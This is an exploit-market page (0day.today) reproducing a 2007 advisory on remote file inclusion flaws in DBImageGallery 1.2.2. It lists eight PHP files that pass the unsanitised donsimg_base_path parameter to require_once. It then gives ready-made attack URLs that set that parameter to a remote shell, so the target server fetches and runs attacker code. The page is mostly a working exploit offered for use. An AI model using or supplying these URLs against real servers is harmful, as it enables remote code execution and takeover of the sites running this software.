[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DBImageGallery 1.2.2 (donsimg_base_path) RFI Vulnerabilities

Author
Denven
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1529
Category
web applications
Date add
21-02-2007
Platform
unsorted
============================================================
DBImageGallery 1.2.2 (donsimg_base_path) RFI Vulnerabilities
============================================================



DBImageGallery 1.2.2
 
*****************
Found by Denven *
*****************
ERROR:
 
admin/attributes.php                      require_once $donsimg_base_path
admin/images.php                          require_once $donsimg_base_path
admin/scan.php                            require_once $donsimg_base_path
includes/attributes.php                   require_once $donsimg_base_path
includes/db_utils.php                     require_once $donsimg_base_path
includes/images.php                       require_once $donsimg_base_path
includes/utils.php                        require_once $donsimg_base_path
includes/values.php                       require_once $donsimg_base_path
 
 
 
**************************************************************************************
RFI:
 
http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]
 

**************************************************************************************



#  0day.today [2024-12-26]  #